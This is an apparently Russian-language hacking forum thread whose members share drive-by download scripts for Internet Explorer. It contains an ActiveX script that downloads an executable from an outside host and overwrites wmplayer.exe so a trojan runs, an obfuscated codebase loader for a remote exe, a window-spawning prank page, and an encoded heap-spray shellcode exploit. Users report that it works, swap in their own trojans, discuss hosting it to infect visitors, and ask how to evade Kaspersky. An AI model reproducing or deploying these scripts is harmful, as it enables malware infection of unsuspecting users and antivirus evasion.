Незнаю, может кто-то такое и выкладывал... По моему скрипт просто золотой =) Я его стырил с сайта, куда он был встроен...

<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.cup-of-coffee.pnz.ru/upload/bin.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms://";
</script>

Незнаю, правильно я его вырезал, или нет... Проверять нехочу =) По адрессу http://www.cup-of-coffee.pnz.ru/upload/bin.exe ничего нет, ну всёравно на свой менять будем! И адресс в Program Files странно прописан, но в таком состоянии он был на сайте... Как он действует =) Через ActiveX загружается файл, (в нашем случаи http://www.cup-of-coffee.pnz.ru/upload/bin.exe) и заменяется на C:\Program Files\Windows Media Player\wmplayer.exe тоесть вместо Windows Media Player! Потом нас кидает на mms:// а это ссылка на медиа файл, и автоматически запускается Windows Media Player, который находится по адрессу C:\Program Files\Windows Media Player\wmplayer.exe где уже вместо него лежит наш вирус ;)

По моему офигительный скрипт!

Thx пробну;)

Я в шоке!!! ОН РАБОТАЕТ!!! И путь реально надо указывать C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe всмысле 4 палки, и он загружается! Вот это да...
<offtopic>
Мне кажеться, или сейчас будет эпидемия пинча, ксинча и всякой другой заразы ;)
</offtopic>

Ponchik, не мог бы ты по-подпробнее объяснить ... что-то у меня не выходит ...
Подвесил скрипт (заменив "http://www.cup-of-coffee.pnz.ru/upload/bin.exe" на ссылку со своими трояном)
Тестировал на себе ... (трой рабочий на 100%)
WM не запускается, трой не срабатывает ...
(вешал на народе)

скрипт палиться Касперским

(вешал на народе)
повесь на jino-net.ru

пример работы скрипта был уже на видео -> http://video.antichat.ru/file179.html

VectorG, Эх... Ну всёавно многие люди невидели то видео... Такчто надеюсь от темы будет польза...
Посмторел видео... Можно тестить другим способом, никаких свойств рабочего стола ненадо! Просто создать HTML файл, сайт необязательно jino-net.ru я на локалхосте делал. А путь можно изменить на C:////test.exe
В итоге у вас будет файл с сайта на диске C:/ и откроется Windows Media Player
==================================================
AciD_FreaK, ну ты сделай как я сказал, не спросисывай сразу в Program Files, а на диск C:/ и может версия IE не подходит...
==================================================
censored!, покажи хоть что-то что не палится каспеским =))))) В сетях на всех компах один IP, поэтому троянсие проги немогут их просканировать, тоесть у тех юзверей не бывает вирусов, из чего следует что у них нет антивирусов! Можно на каком-то сайте какой-то трой подсунуть, например ксинч

покажи хоть что-то что не палится каспеским =))))) если покажет - то оно начнет палиться )

AciD_FreaK
На Народе может не запахать, так как Народ не отдает свои файлы и изображения другим сайтам. Поэтому и пробуй Jino-Net.

censored!, покажи хоть что-то что не палится каспеским
После очередного обновления БД антивиря сам найдешь на своем компе. Там этого полно! =)

Html скрипт хаха.

Музыкант, ну Java... Главное работает!

<script language=javascript>
function souese() {return true;}
window.onerror=souese;
var dr="http://net.org/1.exe";
var sd="Microsoft.XMLHTTP";
var f="ADODB.Stream";
try{
b=new ActiveXObject("'+sd+'");
o=new ActiveXObject(''+f+'');
}
catch(e){};
try{document.write('<object cla'+'ssid=clsid:11311111-1551-1661-1771-%0 codebase="'+dr+'" style=display:none>');}catch(e){document.write('<object classid=clsid:15875600-1000-7600-10430-%0 codebase="'+dr+'" style=display:none></object>');}</script>
вот выложу тож, старенькой правда,палиться, работает только при низкой настройке безопасности.. ну да все равно)

r0cha!, кульно! А куда он сохраняется, или запускается прямо из браузера так? Если так, то клёво!

Тогда "клёво"

А... Вот ещё, старый, но работает, я правда так понимаю это не пирус, но что он делает с компом кроме зависания, я так и не понял... Он чтоли в telnet забивает ('location="telnet:Запуск вируса произведён удачно!!!" или я что-то не так понял...
<html>
<head>
<title>Progressive-XP</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<script>setInterval('location="telnet:Запуск вируса произведён удачно!!!"',10);</script>
<script language="javascript1.3">
setInterval('resizeTo(100,200)',0050);
x=50;
y=50;
function plusY(){
if(y<screen.height-200){
y+=25;
setTimeout('plusY()',0020);
window.moveTo(x,y);
}else{
minusY();
}
}
function minusY(){
if(y>0){
y-=25;
setTimeout('minusY()',0020);
window.moveTo(x,y);
}else{
plusY();
}
}

function plusX(){
if(x<screen.width-100){
x+=20;
setTimeout('plusX()',0020);
window.moveTo(x,y);
}else{
minusX();
}
}
function minusX(){
if(x>0){
x-=20;
setTimeout('minusX()',0020);
window.moveTo(x,y);
}else{
plusX();
}
}
setInterval('window.open("","","height=200 width=100").location=self.location',0500);
</script>
</head>

<body>
<strong>Загрузка ... </strong>
</body>
</html>

Блин! Касперь его палин! not-virus:BadJoke.JS.Spawn.e
А несколько лет назад не палил :)
В общем пошутить над ламаком без антивируса можно =)

Запустика это:)
Работает сто пудов под хп. осел 6.




<html>
<head>
<script language="javascript">
var _GmIw=unescape("%u4b15%ud123%uc1fe%ubef9%u9637%u7c73%ue302%u7a7f%u a80d%u2575%u8148%u69e2%u9bd6%ueb80%u0c7d%u7e99%ub1 49%u7672%u904a%u4005%u2f79%u9334%ub6b4%u4b77%u9f3f %u7478%uf513%ub247%ub998%u3d71%ua9b8%u22b0%ub5fd%u b741%u034f%u14f9%ubabb%u434e%u3c42%u86b3%u35e0%ue1 39%ud520%u271c%u0a67%u15f8%u662d%ube04%u7097%u2437 %u337b%u92fc%ud430%u2cbf%u1d91%u8496%u7deb%u7a70%u 467e%u78b1%ua937%u4697%u0999%u32e1%u34d5%u96b2%u73 43%u087f%u2cfc%u6679%u14be%u1d7c%ub51c%u3fba%u924f %u6bbf%u49d4%u8904%u27e0%ub8b9%ue285%u9024%u397b%u e3f6%u2d77%u41bb%u154a%u25b0%u4076%u9b9f%ub4b3%u48 72%u0c71%u2fa8%u74b7%u0b35%u93d6%u3c05%u2198%u47f9 %u7591%u4e42%u3d0d%u194b%ub6f8%u6967%u38f5%u7be2%u 027c%ub1fd%u7f9f%ud403%u900c%ue03a%u2a47%u78d5%u32 48%ufcc0%ue184%u963d%u0d99%ub341%u677d%u7043%u1c4f %ub266%u34b0%u4bb7%ud180%u2feb%ud601%ue311%u7579%u 427e%ua904%uf523%u9305%u4ea8%u4698%u3577%u4ab6%u15 bf%u3c37%ubebb%u9bb5%u3fba%uf983%u9291%ub924%u1d97 %u7649%uf808%u732c%u2d25%u7271%u407a%u7414%u1027%u b8fd%u98b4%ud213%u7de1%ud418%ueb86%uf71a%u7ed6%u72 7a%u0d7f%u7b4f%u4a70%u1442%u3471%u9135%u66b5%ubab4 %u24b0%ube9f%u81b6%u2ce0%ud53b%u883f%u2ffc%u2d40%u e329%u924b%u0abb%ua8fd%u411c%u3d48%u7c05%u7877%u15 04%u3796%u49b1%ub79b%u2597%u2243%ubff8%u79b2%u7376 %uf520%ub9b3%u0c99%u281d%u74e2%ub867%u2793%u9046%u 47a9%u4e3c%u1b75%u90f9%uf92b%u307e%u14e3%u3149%ud0 d3%u3de0%u4399%ub4a9%u3f24%u797c%ubb34%u98b1%u7225 %u7667%ueb12%u3c78%u747b%ua837%ubf0c%ufe87%uf8c1%u 71b9%u9740%u0dba%u33b8%u9fd5%u1593%u1d41%ue285%uf6 32%u1cd6%u137f%ub2f5%u4ab7%u057a%u77b6%u2f35%u4f91 %u4847%ud42b%u757d%ub504%u6673%u70be%ufd0b%u4b42%u b02d%u27b3%u1946%u2ce1%ueb01%u777e%u7b7a%u924e%u89 96%u78e2%ufc33%u989b%ub89f%u6971%ubbd5%u297f%ue0f7 %ub127%u3c7c%u25a8%u4375%ub3b0%u1a3f%uc0ff%u24f8%u 2c73%u1cb9%ube9b%uf920%ubab4%u4790%u7046%u4105%ufd 10%ub666%u1d79%u4234%ub74e%ua915%ub5bf%u0d76%u120c %u72e1%ud403%u3d91%u4a48%u4937%u3996%u74f5%u3567%u d083%u97d6%u40b2%u284b%u2ffc%u8692%u4fe3%u992d%u7d 04%u9314%u7371%u7a70%u7879%u117d%ud1c1%u09e2%ub7f9 %u97b8%u7eb0%u2476%ue088%u7274%uba0d%u312d%u67eb%u 9bb1%u96bb%ub4bf%u7fb9%u407c%u9f49%u904f%u924e%u48 3f%u21b3%u30d6%u75d4%uf523%u9991%u4346%u3466%ue102 %u3c0c%ua927%u3b77%u2ae3%u41fc%u0535%u4a15%ud508%u 421d%u477b%ufd0a%u4b77%ub6a8%u707c%u7a04%u8137%u2f e0%ubeb2%uf880%u7e98%u791c%ub53d%u7393%ue13a%ueb18 %u7825%u7d14%u992c%u1c74%u9f98%ub296%u4776%u1475%u a949%u3771%ubeb0%u387b%ud4f5%ub427%u92b8%u3472%u04 90%u3d40%u257f%u4a41%ud284%u1be2%ub6d5%ufc22%u0c67 %ub393%u3fa8%u464e%u351d%ue348%u420d%u6643%u05b7%u 2cb1%u3c2d%ub915%u4bf8%u9bbb%uf987%u6b91%u24fd%uba bf%ud397%ub5d6%u4f2f%uc933%ue983%ud9d8%ud9ee%u2474 %u5bf4%u7381%u1213%u127a%u83e6%ufceb%uf4e2%u92ee%u e656%u7a12%ua399%uf12e%ue36e%u7b6a%u6dfd%u625d%ub9 99%u7b32%uaff9%u4e99%ue799%u4bfc%u7fd2%ufebe%u92d2 %ubb15%uebd8%ub813%u12f9%u2e29%ue236%u9f67%ub999%u 7b36%u80f9%u7699%u6d59%u664d%u0d13%u6699%ue799%uf3 f9%uc24e%ub916%u2623%uf176%ud652%uba97%uea6a%u3a99 %u6d1e%u6662%u6dbf%u727a%ueff9%ufa99%ue6a2%u7a12%u 8e99%u252e%u1023%u2c72%u1e9b%uba91%ub669%u8a7a%ue2 98%u124d%u188a%u7498%u1945%u5ff5%u9f41%u0e61%u8b77 %u1540%u927d%u2937%u956b%u1f66%ud57f%u0920%u8a7d%u 1f3c%u836a%u7a12%ue612");

var _v41oHV=unescape("%u4bb7%u2747");
var _qEsu=20+_GmIw.length;
while (_v41oHV.length<_qEsu)
{
_v41oHV+=_v41oHV;
}

var _xEzxzS=_v41oHV.substring(0,_qEsu);
var _p6ChJV=_v41oHV.substring(0,_v41oHV.length-_qEsu);

while(_p6ChJV.length+_qEsu<0x40000)
{
_p6ChJV+=_xEzxzS;
}

var _CBc0mV=new Array();
var _GeT5iua=0;
var _9h88XE=2020;

function _SWPVoJC() {
_BbieHz.innerHTML=Math.round((_GeT5iua/_9h88XE)*100);
if (_GeT5iua<_9h88XE) {
_CBc0mV.push(_p6ChJV+_GmIw);
_GeT5iua++;

}
else {
_BbieHz.innerHTML=100;
_erv7QtZ=document.createElement("input");
_erv7QtZ.type="radio";
_J14xn3ho=_erv7QtZ.createTextRange();
}
}

function _DzaOkN() {
setInterval('_SWPVoJC()', 5);
}
</script>
</head>
<body onload="_DzaOkN()">
Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR />
In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR />
Progress: <span id="_BbieHz"></span>%
</body>
</html>

grinay,у меня даже при просмотре твоего сообщения процессор глючить начинает.

А чем кодирован последний скрипт, поидее касперский пищать на него тоже должен, или я что- то недопонимаю?

Пищит! Exploit.JS.CVE-2006-1359.m

Странно, у меня молчок Avp на этот скрипт, может дело в месячной давности баз...
А чем нибудь закодировать скрипт можно чтоб антивирусы отдыхали, не первый раз вопрос этот на форумах задаю, доходчивого ответа ещё не получял, где пишут "да" где "нет" может тут есть знающие люди?